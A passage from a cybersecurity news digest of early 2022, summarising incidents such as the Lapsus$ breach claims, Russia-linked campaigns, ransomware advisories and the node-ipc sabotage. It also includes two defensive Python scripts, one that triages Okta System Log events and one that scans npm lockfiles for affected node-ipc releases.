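    """Load a System Log export and attach a parsed UTC timestamp to each event."""
    events = json.loads(text)
    for ev in events:
        ts = datetime.strptime(ev["published"], "%Y-%m-%dT%H:%M:%S.%fZ")
        ev["_ts"] = ts.replace(tzinfo=timezone.utc)
    return events


def targets_of(ev):
    """Human-readable identifiers of an event's targets (users, roles, ...)."""
    return [t.get("alternateId") or t.get("displayName") for t in ev.get("target", [])]


def accounts_created_near(events, pivot=PIVOT, days=3):
    """Step 6: users created within +/- `days` of the pivot date."""
    lo, hi = pivot - timedelta(days=days), pivot + timedelta(days=days)
    return [(ev["_ts"].isoformat(), targets_of(ev)[0], ev["actor"]["alternateId"])
            for ev in events
            if ev["eventType"] == "user.lifecycle.create" and lo <= ev["_ts"] <= hi]


def privilege_grants(events):
    """Step 2: admin role grants, with who granted them and to whom."""
    return [(ev["_ts"].isoformat(), ev["actor"]["alternateId"], targets_of(ev))
            for ev in events if ev["eventType"] == "user.account.privilege.grant"]


def support_impersonations(events):
    """Step 5: sessions opened through Okta Support access (impersonation)."""
    return [(ev["_ts"].isoformat(), ev["actor"]["alternateId"], targets_of(ev))
            for ev in events if ev["eventType"].startswith("user.session.impersonation.")]


def triage(text, pivot=PIVOT, days=3):
    """Run all three checks over a raw export and return the findings by section."""
    events = parse_log(text)
    return {
        "created_near_pivot": accounts_created_near(events, pivot, days),
        "privilege_grants": privilege_grants(events),
        "support_impersonations": support_impersonations(events),
    }


if __name__ == "__main__":
    for section, rows in triage(SAMPLE_LOG).items():
        print(section)
        for row in rows:
            print("  ", row)
```

    Against a real export, replace SAMPLE_LOG with the JSON returned by the System Log API and widen the window if the intrusion date is uncertain; an account created by a vendor or support identity and then granted a Super Administrator role within hours is exactly the pattern steps 2, 4 and 6 are asking you to look for.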

    Okta Investigating Claims of Customer Data Breach from Lapsus$ Group

    Okta, a leading provider of authentication services and identity and access management (IAM) solutions, says it is investigating claims of a data breach. On Tuesday, data extortion group Lapsus$ posted screenshots in their Telegram channel of what it alleges to be access to Okta's backend administrative consoles and customer data. As a publicly-traded company worth over $6 billion, Okta employs over 5,000 people across the world and provides identity management and authentication services to major organizations including Siemens, ITV, Pret a Manger, Starling Bank, among others.

    U.S. Government Warns Companies of Potential Russian Cyberattacks

    The U.S. government on Monday once again cautioned of potential cyber attacks from Russia in retaliation for economic sanctions imposed by the west on the country following its military assault on Ukraine last month. "It's part of Russia's playbook," U.S. President Joe Biden said in a statement, citing "evolving intelligence that the Russian Government is exploring options."

    Russia-linked InvisiMole APT Targets State Organizations of Ukraine

    “The Government Team for Response to Computer Emergencies of Ukraine (CERT-UA) warns of spear-phishing messages conducted by UAC-0035 group (aka InvisiMole) against Ukrainian state bodies. The messages use an archive named “501 25 103.zip”, which contains a shortcut file. Upon opening the LNK file, an HTA file will be downloaded and executed on the victim’s computer. The HTA file contains a VBScript code that fetches and decodes the bait file and the malicious program LoadEdge backdoor.”

    Western Digital App Bug Gives Elevated Privileges in Windows, macOS

    Western Digital's EdgeRover desktop app for both Windows and Mac is vulnerable to local privilege escalation and sandbox escape bugs that could allow the disclosure of sensitive information or denial of service (DoS) attacks. EdgeRover is a centralized content management solution for Western Digital and SanDisk products, unifying multiple digital storage devices under a single management interface. It aims to increase usability and comfort by offering a variety of features including content searching, filtering, categorization, collection creation, duplicate detection, and more.

    Microsoft Investigating Claims of Hacked Source Code Repositories

    Microsoft says it is investigating claims that the Lapsus$ data extortion hacking group breached its internal Azure DevOps source code repositories and stole data. On Sunday, the Lapsus$ gang posted a screenshot on Telegram of alleged internal source code repositories, indicating that they hacked Microsoft’s Azure DevOps server. The screenshot posted by the gang showcased the DevOps repository, which contained source code for Cortana and various Bing projects named 'Bing_STC-SV', 'Bing_Test_Agile', and 'Bing_UX'.

    FBI: AvosLocker Ransomware Targets US Critical Infrastructure

    The Federal Bureau of Investigation (FBI) warns of AvosLocker ransomware being used in attacks targeting multiple US critical infrastructure sectors. This was disclosed in a joint cybersecurity advisory published last week in coordination with the US Treasury Department and the Financial Crimes Enforcement Network (FinCEN). "AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors," the FBI said.

    New Unix rootkit Used to Steal ATM banking Data

    Threat analysts following the activity of UNC2891 (LightBasin), a financially motivated group of hackers, report the discovery of a previously unknown Unix rootkit that is used to steal ATM banking data and conduct fraudulent transactions. The particular group of adversaries has been recently observed targeting telecom companies with custom implants, while back in 2020, they were spotted compromising managed service providers and victimizing their clients.

    Hackers claim to breach TransUnion South Africa with 'Password' password

    TransUnion South Africa has disclosed that hackers breached one of their servers using stolen credentials and demanded a ransom payment not to release stolen data. The African division of TransUnion operates in eight African countries offering commercial and consumer insurance and risk information solutions across various industries. According to the company's statement, an unauthorized person obtained access to a server based in South Africa using stolen credentials.

    DirtyMoe Botnet Gains New Exploits in Wormable Module to Spread Rapidly

    The malware known as DirtyMoe has gained new worm-like propagation capabilities that allow it to expand its reach without requiring any user interaction, the latest research has found. Active since 2016, the DirtyMoe botnet is used for carrying out cryptojacking and distributed denial-of-service (DDoS) attacks, and is deployed by means of external exploit kits like PurpleFox or injected installers of Telegram Messenger.

    Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang

    Google's Threat Analysis Group (TAG) took the wraps off a new initial access broker that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform (CVE-2021-40444) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.

    Popular NPM Package Updated to Wipe Russia, Belarus Systems to Protest Ukraine Invasion

    In what's yet another act of sabotage, the developer behind the popular "node-ipc" NPM package shipped a new version to protest Russia's invasion of Ukraine, raising concerns about security in open source and the software supply chain. Affecting versions 10.1.1 and 10.1.2 of the library, the changes introduced undesirable behavior by its maintainer RIAEvangelist, targeting users with IP addresses located either in Russia or Belarus, and wiping arbitrary file contents and replacing them with a heart emoji.
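    A defender's first question after a report like this is whether the affected releases are anywhere in the dependency tree, including nested copies pulled in by other packages. The script below is an added example, not code from the node-ipc project or the report: it walks a package-lock.json in either the lockfile v1 layout (nested "dependencies") or the v2/v3 layout (flat "packages" map) and lists every install of node-ipc at 10.1.1 or 10.1.2, the versions named above. The two lockfiles it scans are constructed samples.

```python
"""Scan a package-lock.json for the sabotaged node-ipc releases.

Added example, not from the node-ipc project. The affected versions
(10.1.1 and 10.1.2) are the ones named in the report; the lockfiles
below are constructed samples covering both lockfile layouts.
"""
import json

# Package name -> set of release versions to flag.
AFFECTED = {"node-ipc": {"10.1.1", "10.1.2"}}

# Constructed lockfile v3: installed packages keyed by their on-disk path.
SAMPLE_LOCK_V3 = json.dumps({
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"dependencies": {"node-ipc": "^10.1.0", "left-pad": "^1.3.0"}},
        "node_modules/node-ipc": {"version": "10.1.2"},
        "node_modules/left-pad": {"version": "1.3.0"},
        # a nested, older copy pulled in by another package: not affected
        "node_modules/some-tool/node_modules/node-ipc": {"version": "9.2.1"},
    },
})

# Constructed lockfile v1: nested "dependencies" objects.
SAMPLE_LOCK_V1 = json.dumps({
    "name": "legacy-app", "lockfileVersion": 1,
    "dependencies": {
        "node-ipc": {"version": "10.1.1"},
        "left-pad": {"version": "1.3.0"},
        "some-tool": {"version": "2.0.0",
                      "dependencies": {"node-ipc": {"version": "9.2.1"}}},
    },
})


def installed_packages(lock):
    """Yield (path, name, version) for every installed package in either layout."""
    if "packages" in lock:  # lockfileVersion 2 or 3
        for path, meta in lock["packages"].items():
            if not path:  # the "" entry describes the root project itself
                continue
            # "node_modules/a/node_modules/@scope/b" -> "@scope/b"
            yield path, path.split("node_modules/")[-1], meta.get("version")
    else:  # lockfileVersion 1: recurse through nested dependency objects
        def walk(deps, prefix):
            for name, meta in deps.items():
                path = f"{prefix}node_modules/{name}"
                yield path, name, meta.get("version")
                yield from walk(meta.get("dependencies", {}), path + "/")
        yield from walk(lock.get("dependencies", {}), "")


def find_affected(lock_text, affected=AFFECTED):
    """Return (path, name, version) for each installed package on the flag list."""
    lock = json.loads(lock_text)
    return [(path, name, version)
            for path, name, version in installed_packages(lock)
            if version in affected.get(name, ())]


if __name__ == "__main__":
    for label, text in (("v3", SAMPLE_LOCK_V3), ("v1", SAMPLE_LOCK_V1)):
        hits = find_affected(text)
        print(f"lockfile {label}: {len(hits)} affected install(s)")
        for path, name, version in hits:
            print(f"  {path}: {name}@{version}")
```

    Run it against the real lockfile with find_affected(open("package-lock.json").read()). Scanning the lockfile rather than package.json matters because a caret range such as ^10.1.0 in package.json says nothing about which release was actually resolved; the AFFECTED map can be extended with other packages as new advisories arrive.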

    Russian Cyclops Blink Botnet Launches Assault Against Asus Routers

    The Cyclops Blink botnet is now targeting Asus routers in a new wave of cyberattacks. Cyclops Blink, a modular botnet, is suspected of being the creation of Sandworm/Voodoo Bear, a Russian advanced persistent threat (APT) group. Several weeks ago, the UK National Cyber Security Centre (NCSC) and the United States' Cybersecurity and Infrastructure Security Agency (CISA), alongside the NSA and FBI, warned of the botnet's existence.

    SolarWinds Warns of Attacks Targeting Web Help Desk Instances

    SolarWinds warned customers of attacks targeting Internet-exposed Web Help Desk (WHD) instances and advised removing them from publicly accessible infrastructure (likely to prevent the exploitation of a potential security flaw). WHD is an enterprise helpdesk ticketing and IT inventory management software designed to help customers automate ticketing and IT asset management tasks.

    Microsoft Creates Tool to Scan MikroTik Routers for TrickBot Infections

    Microsoft released a scanner that detects MikroTik routers hacked by the TrickBot gang to act as proxies for command and control servers. TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.

    Russia Uses Deepfake of Zelensky to Spread Disinformation

    Meta has been forced to remove a deepfake of the Ukrainian President in which he appeared to call on the military to lay down their arms. Nathaniel Gleicher, head of security policy at the social media giant, announced the move in a series of tweets late on Wednesday. “Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did. It appeared on a reportedly compromised website and then started showing across the internet. We’ve quickly reviewed and removed this video for violating our policy against misleading manipulated media, and notified our peers at other platforms.”

    Major Internet Provider Warding Off Cyber Attacks to Keep Ukrainians Connected

    Attacks targeting Ukraine continue; in a recent report from CPOMagazine, ISPs are being targeted in coordinated attacks to disrupt internet activity for Ukrainian citizens, governmental organizations, and private ones, in order to disrupt operations and generate fear amongst Ukrainians. Internal sources said they could not pinpoint the source of, or those responsible for, the cyberattacks that hit “key nodes of ISP networks” (CPOMagazine, 2022). Both Triolan and Ukrtelecom, which have thousands of customers globally, have experienced random outages from the start of the Russian invasion on February 24 onward. Reports suggest the outages have lasted from minutes to days, with the most prolonged outages at Triolan, which temporarily disabled services so that they could be restored without intermittent interruption. The time needed to restore services increased because various networking devices required physical access for reconfiguration. The company has already restored more than two-thirds (70%) of the Internet nodes in Dnipro, Odesa, Kyiv, Kharkiv, Poltava, Zaporizhia, and Rivne, and stated that it is trying to stop the attackers as soon as possible and resume the network in all areas, according to a post on Telegram.

    New Linux Botnet Exploits Log4J, Uses DNS Tunneling for Comms

    A recently discovered botnet under active development targets Linux systems, attempting to ensnare them into an army of bots ready to steal sensitive info, install rootkits, create reverse shells, and act as web traffic proxies. The newly found malware, dubbed B1txor20 by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), focuses its attacks on Linux devices with ARM and x64 CPU architectures.

    OpenSSL Cert Parsing Bug Causes Infinite Denial of Service Loop

    OpenSSL has released a security update to address a vulnerability in the library that, if exploited, triggers an infinite loop and leads to denial of service conditions. Denial of service attacks may not be the most disastrous security problem, but they can still cause significant business interruption, long-term financial repercussions, and brand reputation degradation for those affected.

    Dozens of Ransomware Variants Used In 722 Attacks Over 3 Months

    The ransomware space was very active in the last quarter of 2021, with threat analysts observing 722 distinct attacks deploying 34 different variants. This massive amount of activity creates problems for the defenders, making it harder to keep up with individual group tactics, indicators of compromise, and detection opportunities. Compared to Q3 2021, the last quarter had 18% higher attack volume, while the comparison to Q2 2021 results in a difference of 22%, so there’s a trend of increasing attack numbers.

    Thousands of Mobile Apps Expose User Data Via Cloud Misconfigurations

    A report recently published by Flashpoint highlights the risk associated with cloud security and its various infrastructure. Check Point found that applications, otherwise known as 'apps,' are susceptible to data leaks due to misconfigurations of back-end cloud databases. In cloud computing, as in on-premises configurations, a server in a closet provides clients or endpoints on local networks access to the resources required to complete one's job function. The 'back end' is the "cloud" section where databases or resources live. The front end includes the client's computer (or computer network) and the application required to access the cloud computing system. In this particular report, the client is a mobile device where applications or clients are obtained either through a third-party website or through a proprietary distribution platform like Android's 'Google Play Store,' Apple's 'App Store,' or, for jailbroken products, 'Cydia.' During Check Point's study, they discovered 2113 mobile applications whose Firebase back end was exposed due to misconfigurations.

    German Government Advises Against Using Kaspersky Antivirus

    Germany's Federal Office for Information Security, BSI, is warning companies against using Kaspersky antivirus products due to threats made by Russia against the EU, NATO, and Germany. Kaspersky is a Moscow-based cybersecurity and antivirus provider founded in 1997, that has a long history of success, but also controversy over the company's possible relationship with the Russian government.

    Massive Phishing Campaign Uses 500+ Domains Leading to Fake Login Pages

    Large-scale phishing activity using hundreds of domains to steal credentials for Naver, a Google-like online platform in South Korea, shows infrastructure overlaps linked to the TrickBot botnet. The resources used for this attack show the sheer size of the cybercriminal effort to collect login data to be used in various attacks. Similar to Google, Naver provides a diverse set of services that range from web search to email, news, and the NAVER Knowledge iN online Q&A platform.

    CaddyWiper: More Destructive Wiper Malware Strikes Ukraine

    Researchers have uncovered a new form of wiper malware being used in assaults against Ukrainian organizations. On March 14, ESET published a Twitter thread documenting the malware, dubbed CaddyWiper, which was compiled on the same day it was deployed to target networks. The wiper -- the third discovered in as many weeks by the cybersecurity firm -- has been detected "on a few dozen systems in a limited number of organizations," according to ESET.

    ‘GraphSteel’ and ‘GrimPlant’ Delivered via Fake Antivirus Updates: Ukrainian Organizations

    Security researchers from MalwareHunterTeam analyzed phishing emails targeting Ukrainian governmental agencies to ultimately infect targeted machines with Cobalt Strike Beacons by imitating legitimate antivirus companies through tainted or malicious (fake) updates. Aside from Cobalt Strike, the attackers also used a dropper, coincidentally titled “dropper.exe,” which was used to obtain a ‘Go’ downloader that executed an additional file disguised as a Java SDK, “an environment for building applications and components using the Java programming language.”

    Israeli Government Websites Taken Offline in Large-Scale Cyber-Attack

    Israeli government websites were taken offline yesterday in what was described as the largest ever cyber-attack to be launched against the country. The widescale Distributed Denial of Service (DDoS) successfully took down the websites of Israel’s Prime Minister’s Office and its interior, health, justice and welfare ministries. However, all these websites appear to be operational again.

    Automotive Giant DENSO Hit by New Pandora Ransomware Gang

    Automotive parts manufacturer DENSO has confirmed that it suffered a cyberattack on March 10th after a new Pandora ransomware operation began leaking data allegedly stolen during the attack. DENSO is one of the world's largest automotive components manufacturers, supplying brands such as Toyota, Mercedes-Benz, Ford, Honda, Volvo, Fiat, and General Motors with a wide range of electrical, electronic, powertrain control, and various other specialized parts.

    QNAP Warns Severe Linux Bug Affects Most of Its NAS Devices

    Taiwanese hardware vendor QNAP warns most of its Network Attached Storage (NAS) devices are impacted by a high severity Linux vulnerability dubbed 'Dirty Pipe' that allows attackers with local access to gain root privileges. The 'Dirty Pipe' security bug affects Linux Kernel 5.8 and later versions, even on Android devices. If successfully exploited, it allows non-privileged users to inject and overwrite data in read-only files, including SUID processes that run as root.

    Russian Ransomware Gang Retool Custom Hacking Tools of Other APT Groups

    A Russian-speaking ransomware outfit likely targeted an unnamed entity in the gambling and gaming sector in Europe and Central America by repurposing custom tools developed by other APT groups like Iran's MuddyWater, new research has found. The unusual attack chain involved the abuse of stolen credentials to gain unauthorized access to the victim network, ultimately leading to the deployment of Cobalt Strike payloads on compromised assets, said Felipe Duarte and Ido Naor, researchers at Israeli incident response firm Security Joes, in a report published last week.

    Critical Infrastructure Threat as Ransomware Groups Target 'Enemies of Russia'

    The cybercrime underground has fractured into pro-Ukraine and pro-Russia camps, with the latter increasingly focused on critical national infrastructure (CNI) targets in the West, according to a new report from Accenture. The consulting giant’s Accenture Cyber Threat Intelligence (ACTI) arm warned that the ideological schism could spell mounting risk for Western organizations as pro-Kremlin criminal groups adopt quasi-hacktivist tactics to choose their next victims.

    Anonymous Claims to Have Hacked German Subsidiary of Russian Energy Giant Rosneft

    The Anonymous hacker collective claimed to have hacked the German branch of the Russian energy giant Rosneft. In a post this week, hacktivists announced that they had stolen 20 terabytes of data from the company. According to the German website WELT, the attack on Rosneft Deutschland GmbH will have “relevant effects.” The news of the attack was also confirmed by the German Federal Office for Information Security (BSI); the company had reported an IT security incident on Saturday night.

    Corporate Website Contact Forms Used to Spread BazarBackdoor Malware

    The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software. BazarBackdoor is a stealthy backdoor malware created by the TrickBot group and is now under development by the Conti ransomware operation. This malware provides threat actors remote access to an internal device that can be used as a launchpad for further lateral movement within a network. The BazarBackdoor malware is usually spread through phishing emails that include malicious documents that download and install the malware.

    Malware Disguised as Security Tool Targets Ukraine's IT Army

    A new malware campaign is taking advantage of people's willingness to support Ukraine's cyber warfare against Russia to infect them with password-stealing Trojans. Last month, the Ukrainian government announced a new IT Army composed of volunteers worldwide who conduct cyberattacks and DDoS attacks against Russian entities. This initiative has led to an outpouring of support by many people worldwide who have been helping target Russian organizations and sites, even if that activity is considered illegal.

    Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up… Sort Of

    You’ve probably heard of the Conti ransomware group. After their 2020 emergence, they’ve accumulated at least 700 victims, where by “victims” we mean ‘big fish’ corporations with millions of dollars in revenue; unlike your average neighborhood ransomware operation, Conti never cared for extorting your mother-in-law for her vacation photos. For a while, Conti was the face of ransomware, along with fellow gang REvil – until this February, when 14 REvil operatives were arrested by the Russian authorities, leaving Conti effectively alone in its position as a major league ransomware operation. At the time, this was cautiously hailed as a sign of goodwill on Russia’s part; some figured that possibly the Russians would finally refuse to tolerate the incessant and irreverent attacks originating on Russian soil and targeted at western corporate offices, schools and hospitals. Now, a month later and two weeks into the full-blown war between Russia and Ukraine, this utopian vision does not seem so likely.

    Lapsus$ Ransomware Group is Hiring, It Announced Recruitment of Insiders

    Lapsus$ is a newer ransomware gang that recently made headlines after some prominent attacks on Nvidia and Samsung. “The dumps released as Torrent files contain gigabytes of sensitive documents, digital code-signing certificates and source codes. Hackers have leaked the credentials of more than 71,000 Nvidia employees, source code of NVIDIA’s DLSS (Deep Learning Super Sampling) AI rendering technology, information about six supposed unannounced GPUs, and 190GB of Samsung source codes related to trusted applets in the smartphone TrustZone environment” (Security Affairs, 2022). More recently, the Lapsus$ group claims to have stolen 200 GB of data from Vodafone.

    New Exploit Bypasses Existing Spectre-v2 Mitigations in Intel, AMD, Arm CPUs

    Researchers have disclosed a new technique that could be used to circumvent existing hardware mitigations in modern processors from Intel, AMD, and Arm and stage speculative execution attacks such as Spectre to leak sensitive information from host memory. Attacks like Spectre are designed to break the isolation between different applications by taking advantage of an optimization technique called speculative execution in CPU hardware implementations to trick programs into accessing arbitrary locations in memory and thus leak their secrets.

    Dirty Pipe Linux Flaw Allows Gaining Root Privileges on Major Distros - CISA ALERT - Dirty Pipe Linux CVE

    Dirty Pipe Privilege Escalation Vulnerability in Linux. CISA is aware of a privilege escalation vulnerability in Linux kernel versions 5.8 and later known as “Dirty Pipe” (CVE-2022-0847). A local attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review (CVE-2022-0847) and update to Linux kernel versions 5.16.11, 5.15.25, and 5.10.102 or later.

    Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign

    The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report published today.

    Russia Creates Its Own TLS Certificate Authority to Bypass Sanctions

    Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. The sanctions imposed by western companies and governments are preventing Russian sites from renewing existing TLS certificates, causing browsers to block access to sites with expired certificates.

    Joint Cyber Security Advisory - Conti Ransomware

    Conti cyber threat actors remain active and reported Conti ransomware attacks against U.S. and international organizations have risen to more than 1000. Notable attack vectors include Trickbot and Cobalt Strike (see below for details). While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, NSA, and the United States Secret Service (USSS) encourage organizations to review this advisory and apply the recommended mitigations.

    Critical Bugs Could Let Attackers Remotely Hack, Damage APC Smart UPS Devices

    Three high-impact security vulnerabilities have been disclosed in APC Smart-UPS devices that could be abused by remote adversaries as a physical weapon to access and control them in an unauthorized manner. Collectively dubbed TLStorm, the flaws "allow for complete remote takeover of Smart-UPS devices and the ability to carry out extreme cyber-physical attacks," Ben Seri and Barak Hadad, researchers from IoT security company Armis, said in a report published Tuesday.

    US Treasury: Russia May Bypass Sanctions Using Ransomware Payments

    The Treasury Department's Financial Crimes Enforcement Network (FinCEN) warned U.S. financial institutions this week to keep an eye out for attempts to evade sanctions and US-imposed restrictions following Russia's invasion of Ukraine. Although unlikely, FinCEN added that convertible virtual currency (CVC) — the term used by U.S. Treasury to describe unregulated digital currency like cryptocurrency — exchanges and other financial institutions may still observe transactions linked to crypto wallets associated with sanctioned Russian, Belarusian, and affiliated individuals.

    Russian Government Sites Hacked in Supply Chain Attack

    Russia says some of its federal agencies' websites were compromised in a supply chain attack on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies. The list of sites impacted in the attack includes the websites of the Energy Ministry, the Federal State Statistics Service, the Federal Penitentiary Service, the Federal Bailiff Service, the Federal Antimonopoly Service, the Culture Ministry, and other Russian state agencies.

    Emotet Growing Slowly But Steadily Since November Resurgence

    The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 92,000 systems in 172 countries. While this may be a far cry from the once global dominance of having 1.6 million devices under its control, it shows that the malware is still undergoing a resurgence, and it’s getting stronger every day. Emotet activity stopped in 2019 while its second major version was in circulation, and the malware returned only in November 2021, with the help of another malware known as Trickbot.

    FBI: RagnarLocker Ransomware Indicators of Compromise

    The FBI first became aware of RagnarLocker in April 2020 and subsequently produced a FLASH to disseminate known indicators of compromise (IOCs) at that time. This FLASH provides updated and additional IOCs to supplement that report. As of January 2022, the FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware, including entities in the critical manufacturing, energy, financial services, government, and information technology sectors. RagnarLocker ransomware actors work as part of a ransomware family, frequently changing obfuscation techniques to avoid detection and prevention.

    Mozilla Firefox 97.0.2 Fixes Two Actively Exploited Zero-Day Bugs

    Mozilla has released Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0 to fix two critical zero-day vulnerabilities actively exploited in attacks. Both zero-day vulnerabilities are "Use-after-free" bugs, which is when a program tries to use memory that has been previously cleared. When threat actors exploit this type of bug, it can cause the program to crash while at the same time allowing commands to be executed on the device without permission.

    Piracy OK: Russia to Ease Software Licensing Rules After Sanctions

    The Russian authorities are drafting a set of measures to support the country's economy against the pressure of foreign sanctions, and when it comes to software licensing, the proposal greenlights a form of piracy. More specifically, the suggested plan is to establish a "unilateral" software licensing mechanism that would renew expired licenses without requiring the consent of the copyright or patent owner.

    Microsoft Fixes Critical Azure Bug That Exposed Customer Data

    Microsoft has addressed a vulnerability in the Azure Automation service that could have allowed attackers to take complete control over other Azure customers' data. Microsoft Azure Automation Service provides process automation, configuration management, and update management features, with each scheduled job running inside isolated sandboxes for each Azure customer.

    Rompetrol Gas Station Network Hit by Hive Ransomware

    BleepingComputer has learned that the Hive ransomware gang is behind this attack, and they're asking for a multi-million ransom. Rompetrol is the operator of Romania's largest oil refinery, Petromidia Navodari, which has a processing capacity of over five million tons per year.

    Malware Now Using NVIDIA's Stolen Code Signing Certificates

    Last week, NVIDIA confirmed they were the targets of a cyber attack resulting in the loss of proprietary corporate data. Threat actors are now using stolen NVIDIA code signing certificates to sign malware. Because it is signed with these certificates, the malware appears trustworthy, and malicious drivers can be loaded on Windows machines.

    Social Media Phishing Attacks Are at an All Time High

    Phishing campaigns continue to focus on social media, ramping up efforts to target users for the third consecutive year as the medium becomes increasingly used worldwide for communication, news, and entertainment. The targeting of social media is the highlighted finding in the 2021 Phishing report by cybersecurity firm Vade, who analyzed phishing attack patterns that unfolded throughout 2021.

    Hacktivists, Cybercriminals Switch to Telegram After Russian Invasion

    Telegram messaging has taken a pivotal role in the ongoing conflict between Russia and Ukraine, as it is being massively used by hacktivists and cybercriminals alike. According to a report from cybersecurity company Check Point, the number of Telegram groups has increased sixfold since February 24 and some of them, dedicated to certain topics, have ballooned in size, in some cases counting more than 250,000 members.

    CISA Warns Organizations to Patch 95 Actively Exploited Bugs

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 95 vulnerabilities to its list of actively exploited security issues, the largest number since issuing the binding operational directive (BOD) last year. Despite some of them being known for almost two decades, the agency notes that the bugs “pose significant risk to the federal enterprise.”

    Microsoft Suspends All New Sales of Microsoft Products and Services in Russia

    In a March 4 blog post, Microsoft announced it will be suspending new sales of its products and services to Russia. Microsoft is "coordinating closely and working in lockstep with the governments of the United States, the European Union and the United Kingdom, and they are stopping many aspects of our business in Russia in compliance with governmental sanctions decisions."

    These Are the Sources of DDoS Attacks against Russia, Local NCCC Warns

    The list of domains includes the US CIA and FBI, USA Today, and Ukraine’s Korrespondent magazine, along with domains and apps specifically set up to target Russia amid the invasion. The advisory provides a list of recommendations for Russian organizations, including conducting an inventory of all network devices and services operating in their organization, restricting outside access to them, setting up logging systems, using complex and unique passwords, using Russian DNS servers, watching out for phishing attacks, and enforcing data backups.

    Free Decryptor Released for HermeticRansom Victims In Ukraine

    Avast has released a decryptor for the HermeticRansom ransomware strain used in targeted attacks against Ukrainian systems over the past ten days. The ransomware strain was delivered along with a computer worm named HermeticWizard and served more as a decoy in wiper attacks rather than a tool to support financial extortion. Still, its infections have disrupted vital Ukrainian systems.

    Popular Open-source PJSIP Library is Affected by Critical Flaws

    JFrog’s Security Research team today released five new vulnerabilities discovered in the popular PJSIP open-source multimedia communication library. “PJSIP is a communication library written in C language implementing standard-based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. It combines signaling protocol (SIP) with rich multimedia framework and NAT traversal functionality into high level API that is portable and suitable for almost any type of systems ranging from desktops, embedded systems, to mobile handsets.”

    Hackers Begin Weaponizing TCP Middlebox Reflection for Amplified DDoS Attacks

    Distributed denial-of-service (DDoS) attacks leveraging a new amplification technique called TCP Middlebox Reflection have been detected for the first time in the wild, six months after the novel attack mechanism was presented in theory. A middlebox is an in-network device that sits on the path between two communicating end-hosts and can monitor, filter, or transform packet streams in-flight. Unlike traditional network devices like routers and switches, middleboxes operate not only on packets’ headers but also on their payloads using Deep Packet Inspection.

    Hackers Try to Hack European Officials to Get Info on Ukrainian Refugees, Supplies

    Details of a new nation-state sponsored phishing campaign have been uncovered setting its sights on European governmental entities in what's seen as an attempt to obtain intelligence on refugee and supply movement in the region. Enterprise security company Proofpoint, which detected the malicious emails for the first time on February 24, 2022, dubbed the social engineering attacks.

    Targeted APT Activity: BABYSHARK Is Out for Blood

    Huntress released details on a newly discovered APT group that aligns with North Korean threat actors. The group has been known to target national security think tanks with a piece of malware called BABYSHARK. The state sponsored threat actors are using the customized malware to target specific victim networks in targeted attacks.

    Anonymous Hits Russian Nuclear Institute and Leaks Stolen Data

    “Anonymous and numerous hacker groups linked to the popular collective continue to launch cyber attacks against Russian and Belarusian government organizations and private businesses” (Security Affairs, 2022). Ukraine has requested the help of IT “vigilantes” to help disrupt Russian operations in the area. Since then, massive DDoS attacks have been carried out against various Russian government entities including the Duma and the Ministry of Defense.

    Ukrainian Officials, Military Targeted by Ghostwriter Hackers

    Facebook (now known as Meta) says it took down accounts used by a Belarusian-linked hacking group (UNC1151 or Ghostwriter) to target Ukrainian officials and military personnel on its platform. In November 2021, Mandiant security researchers linked the UNC1151 threat group with high confidence to the Belarusian government, as well as a hacking operation the company tracks as Ghostwriter. Facebook also blocked multiple phishing domains used by the threat actors to try and compromise the accounts of Ukrainian users.

    Conti Ransomware's Internal Chats Leaked After Siding With Russia

    A Ukrainian security researcher has leaked over 60,000 internal messages belonging to the Conti ransomware operation after the gang sided with Russia over the invasion of Ukraine. BleepingComputer has independently confirmed the validity of these messages from internal conversations previously shared with BleepingComputer regarding Conti's attack on Shutterfly.

    Toyota Halts Production After Reported Cyberattack on Supplier

    Giant Japanese automaker Toyota Motors has announced that it stopped car production operations. The outage was forced by a system failure at one of its suppliers of vital parts, Kojima Industries, which reportedly suffered a cyberattack. Kojima Industries is a Japanese manufacturer of plastic components that are crucial for car production, so this is a case of severe supply chain interruption.

    Moscow Exchange Downed by Cyber-attack

